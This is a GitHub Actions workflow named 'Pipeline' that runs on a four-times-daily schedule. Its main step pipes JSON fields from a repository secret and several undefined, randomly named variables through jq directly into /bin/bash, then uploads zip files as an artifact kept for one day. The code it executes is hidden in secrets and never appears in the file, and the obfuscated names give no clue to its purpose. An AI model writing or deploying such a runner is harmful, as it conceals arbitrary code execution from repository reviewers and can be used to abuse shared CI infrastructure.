name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '41 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          hd8: ${{ secrets.hd8 }}
        run: |
          printf '%s' "$hd8" | jq -r .iyssi1 | /bin/bash
          printf '%s' "$zu831" | jq -r .fpa14192 | /bin/bash
          printf '%s' "$g16613" | jq -r .izl7869 | /bin/bash
          printf '%s' "$gg8107" | jq -r .wpoh82321 | /bin/bash
          printf '%s' "$gi62" | jq -r .zndg66 | /bin/bash
          echo $m22150 | jq -r .aaq5423 | /bin/bash
          printf '%s' "$fyhd4392" | jq -r .lkdn9 | /bin/bash
          echo $x5621 | jq -r .dntjm6 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: oxilal34
          path: "*.zip"
          retention-days: 1
